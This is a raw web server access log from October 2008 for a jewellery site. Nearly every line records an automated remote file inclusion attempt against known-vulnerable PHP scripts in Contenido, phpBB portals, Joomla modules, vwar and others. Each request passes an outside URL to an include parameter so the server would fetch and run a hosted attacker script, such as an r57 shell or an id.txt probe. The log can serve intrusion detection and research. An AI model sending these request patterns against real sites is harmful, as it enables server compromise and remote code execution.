98.210.195.32 - - [30/Oct/2008:17:00:58 -0700] "GET /logs/scripts.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://usuarios.lycos.es/asdasdasd123/idshell.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
89.108.67.204 - - [30/Oct/2008:17:02:27 -0700] "GET /errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.52.16.226 - - [30/Oct/2008:17:09:04 -0700] "GET /lostpasswd.php?env[include_prefix]=http://thaisfantasias.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
195.70.48.67 - - [30/Oct/2008:17:11:59 -0700] "GET /errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
200.155.18.50 - - [30/Oct/2008:17:13:31 -0700] "GET /logs/access_080501.log//errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
195.70.48.67 - - [30/Oct/2008:17:24:14 -0700] "GET /logs/access.log//errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
195.70.48.67 - - [30/Oct/2008:17:24:14 -0700] "GET /errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
195.70.48.67 - - [30/Oct/2008:17:24:14 -0700] "GET /logs//errors.php?error=http://immobiliarecervinia.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
69.64.49.177 - - [30/Oct/2008:17:34:52 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.64.49.177 - - [30/Oct/2008:17:34:52 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.64.49.177 - - [30/Oct/2008:17:34:52 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
70.85.192.194 - - [30/Oct/2008:17:35:42 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
70.85.192.194 - - [30/Oct/2008:17:35:42 -0700] "GET /logs/access_080531.log%20%20//config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
209.160.65.55 - - [30/Oct/2008:17:36:25 -0700] "GET /includes/functions_portal.php?phpbb_root_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
209.160.65.55 - - [30/Oct/2008:17:36:25 -0700] "GET /logs/access_081001.log//includes/functions_portal.php?phpbb_root_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
209.160.65.55 - - [30/Oct/2008:17:36:25 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.85.192.194 - - [30/Oct/2008:17:36:34 -0700] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
70.85.192.194 - - [30/Oct/2008:17:38:11 -0700] "GET /logs/access_080531.log//config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
61.72.104.84 - - [30/Oct/2008:17:38:18 -0700] "GET /logs/access_080531.log//config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sojewels.com"
61.72.104.84 - - [30/Oct/2008:17:38:18 -0700] "GET /config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sojewels.com"
61.72.104.84 - - [30/Oct/2008:17:38:18 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sojewels.com"
61.72.104.84 - - [30/Oct/2008:17:40:44 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sojewels.com"
121.124.127.40 - - [30/Oct/2008:17:41:15 -0700] "GET /logs/access_080531.log%20%20/lostpasswd.php?env[include_prefix]=http://reynoldsdnaproject.com///photos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
121.124.127.40 - - [30/Oct/2008:17:41:15 -0700] "GET /logs/access_080531.log%20%20/lostpasswd.php?env[include_prefix]=http://reynoldsdnaproject.com///photos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
69.64.49.177 - - [30/Oct/2008:17:41:26 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
70.85.192.194 - - [30/Oct/2008:17:42:17 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:17:42:43 -0700] "GET /logs/access.log/include.php?path[docroot]=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:17:42:43 -0700] "GET /include.php?path[docroot]=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:17:42:43 -0700] "GET /logs/include.php?path[docroot]=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:17:43:17 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:17:43:17 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:17:43:17 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
200.201.48.198 - - [30/Oct/2008:17:44:19 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
69.64.49.177 - - [30/Oct/2008:17:44:35 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
24.67.0.44 - - [30/Oct/2008:17:45:38 -0700] "GET /logs/access.log/errors.php?error=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
24.67.0.44 - - [30/Oct/2008:17:45:38 -0700] "GET /errors.php?error=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
24.67.0.44 - - [30/Oct/2008:17:45:38 -0700] "GET /logs/errors.php?error=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
64.128.80.16 - - [30/Oct/2008:17:45:55 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.asa-auto.ba/mambo/cache/scan/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
64.128.80.16 - - [30/Oct/2008:17:45:55 -0700] "GET /logs/access_080531.log//config/dbutil.bck.php?confdir=http://www.asa-auto.ba/mambo/cache/scan/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
69.64.49.177 - - [30/Oct/2008:17:48:47 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.64.49.177 - - [30/Oct/2008:17:48:47 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.64.49.177 - - [30/Oct/2008:17:48:47 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.201.48.198 - - [30/Oct/2008:17:50:51 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
200.201.48.198 - - [30/Oct/2008:17:50:51 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
200.201.48.198 - - [30/Oct/2008:17:50:51 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:17:50:53 -0700] "GET /logs/access_080531.log/include.php?path[docroot]=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
24.67.0.44 - - [30/Oct/2008:17:52:22 -0700] "GET /errors.php?error=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
87.238.163.25 - - [30/Oct/2008:17:54:53 -0700] "GET /logs/access_080531.log//config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/bloodid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
87.238.163.25 - - [30/Oct/2008:17:54:59 -0700] "GET /config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/bloodid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
87.238.163.25 - - [30/Oct/2008:17:55:04 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/bloodid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:17:55:29 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:17:55:29 -0700] "GET //vwar/backup/errors.php?error=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:17:55:29 -0700] "GET /logs///vwar/backup/errors.php?error=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
206.225.91.21 - - [30/Oct/2008:18:01:46 -0700] "GET /?shop_this_skin_path=http://www.cemsantjoan.cat/administrator/components/com_juser/id.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sojewels.com"
206.225.91.21 - - [30/Oct/2008:18:01:46 -0700] "GET /logs//?shop_this_skin_path=http://www.cemsantjoan.cat/administrator/components/com_juser/id.txt????? HTTP/1.1" 200 1801 "-" "libwww-perl/5.79" "www.sojewels.com"
65.254.55.178 - - [30/Oct/2008:18:02:23 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
65.254.55.178 - - [30/Oct/2008:18:02:23 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
65.254.55.178 - - [30/Oct/2008:18:02:23 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:18:04:43 -0700] "GET /logs/access.log//frame.php?framefile=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:18:04:43 -0700] "GET /frame.php?framefile=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:18:04:43 -0700] "GET /logs//frame.php?framefile=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
65.254.55.178 - - [30/Oct/2008:18:06:19 -0700] "GET /logs/scripts.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
69.64.49.177 - - [30/Oct/2008:18:06:40 -0700] "GET /logs/scripts.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
71.245.171.108 - - [30/Oct/2008:18:10:22 -0700] "GET /logs/access.log/errors.php?error=http://matttherrien.net/fuzzylime//code/v6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
71.245.171.108 - - [30/Oct/2008:18:10:22 -0700] "GET /errors.php?error=http://matttherrien.net/fuzzylime//code/v6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
71.245.171.108 - - [30/Oct/2008:18:10:23 -0700] "GET /logs/errors.php?error=http://matttherrien.net/fuzzylime//code/v6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
154.5.252.194 - - [30/Oct/2008:18:12:36 -0700] "GET /logs/errors.php?error=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
154.5.252.194 - - [30/Oct/2008:18:12:36 -0700] "GET /logs/errors.php?error=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
154.5.252.194 - - [30/Oct/2008:18:12:36 -0700] "GET /errors.php?error=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
154.5.252.194 - - [30/Oct/2008:18:12:36 -0700] "GET /errors.php?error=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
69.64.49.177 - - [30/Oct/2008:18:18:58 -0700] "GET /logs/access_081001.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
72.29.83.65 - - [30/Oct/2008:18:19:06 -0700] "GET /logs/access.log/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.29.83.65 - - [30/Oct/2008:18:19:06 -0700] "GET /errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.29.83.65 - - [30/Oct/2008:18:19:06 -0700] "GET /logs/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
89.159.202.119 - - [30/Oct/2008:18:20:23 -0700] "GET /logs/access.log HTTP/1.0" 200 15414 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sojewels.com"
154.5.252.194 - - [30/Oct/2008:18:26:14 -0700] "GET /logs/scripts.log/errors.php?error=http://www.r-techracing.hu/downloads/rob.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:18:29:49 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:18:29:50 -0700] "GET //vwar/backup/errors.php?error=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.220.202.32 - - [30/Oct/2008:18:29:50 -0700] "GET /logs///vwar/backup/errors.php?error=http://jeannedawsonart.com/images/r57????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
202.181.105.117 - - [30/Oct/2008:18:30:05 -0700] "GET /logs//vwar/backup/errors.php?error=http://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
202.181.105.117 - - [30/Oct/2008:18:30:06 -0700] "GET /logs/access.log%20%20//vwar/backup/errors.php?error=http://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
202.181.105.117 - - [30/Oct/2008:18:33:05 -0700] "GET /logs/access.log//vwar/backup/errors.php?error=http://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
202.181.105.117 - - [30/Oct/2008:18:33:05 -0700] "GET /logs//vwar/backup/errors.php?error=http://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
64.128.80.16 - - [30/Oct/2008:18:33:55 -0700] "GET /logs/access_080531.log%20%20//config/dbutil.bck.php?confdir=http://www.asa-auto.ba/mambo/cache/scan/readme.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
87.238.163.25 - - [30/Oct/2008:18:35:24 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://vidinas.net/tmp/images/bloodid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
72.29.83.65 - - [30/Oct/2008:18:38:23 -0700] "GET /logs/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.29.83.65 - - [30/Oct/2008:18:38:23 -0700] "GET /logs/access.log/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.29.83.65 - - [30/Oct/2008:18:38:23 -0700] "GET /errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
80.67.23.90 - - [30/Oct/2008:18:50:08 -0700] "GET /atom.php5?page=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
80.67.23.90 - - [30/Oct/2008:18:50:11 -0700] "GET /logs/access.log//atom.php5?page=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
200.93.147.155 - - [30/Oct/2008:18:56:56 -0700] "GET /logs/?sourcedir=http://www.geocities.com/nikisahputri/test.txt??? HTTP/1.1" 200 1796 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.sojewels.com"
200.93.147.155 - - [30/Oct/2008:18:56:59 -0700] "GET /?sourcedir=http://www.geocities.com/nikisahputri/test.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:18:57:42 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:18:57:42 -0700] "GET /logs/access_080531.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:18:57:42 -0700] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:19:00:01 -0700] "GET /logs/access_080531.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:19:00:02 -0700] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:19:00:02 -0700] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:19:08:29 -0700] "GET /logs/access_080501.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
203.146.26.91 - - [30/Oct/2008:19:11:06 -0700] "GET /logs/access_080501.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:13:59 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:14:00 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
118.219.254.105 - - [30/Oct/2008:19:14:00 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:14:06 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:14:06 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
219.117.252.226 - - [30/Oct/2008:19:14:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:14:08 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:14:09 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.214.171.161 - - [30/Oct/2008:19:14:09 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
74.55.53.226 - - [30/Oct/2008:19:14:42 -0700] "GET /logs/access_080531.log//tools/send_reminders.php?noSet=0&includedir=http://www.pnladistancia.com.ar/vnc/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.53.226 - - [30/Oct/2008:19:14:42 -0700] "GET /logs/access_080531.log//tools/send_reminders.php?noSet=0&includedir=http://www.pnladistancia.com.ar/vnc/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.53.226 - - [30/Oct/2008:19:14:42 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.pnladistancia.com.ar/vnc/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.53.226 - - [30/Oct/2008:19:14:42 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.pnladistancia.com.ar/vnc/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.53.226 - - [30/Oct/2008:19:14:42 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.pnladistancia.com.ar/vnc/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.53.226 - - [30/Oct/2008:19:14:42 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.pnladistancia.com.ar/vnc/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.53.226 - - [30/Oct/2008:19:16:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.pnladistancia.com.ar/vnc/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.55.53.226 - - [30/Oct/2008:19:16:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.pnladistancia.com.ar/vnc/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:19:17:46 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:19:17:46 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.202.2.220 - - [30/Oct/2008:19:17:47 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
78.129.138.184 - - [30/Oct/2008:19:27:29 -0700] "GET /logs/access.log%20%20//c/public/displayCategory.php?basepath=http://www.rss-tochka.ru//poll/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sojewels.com"
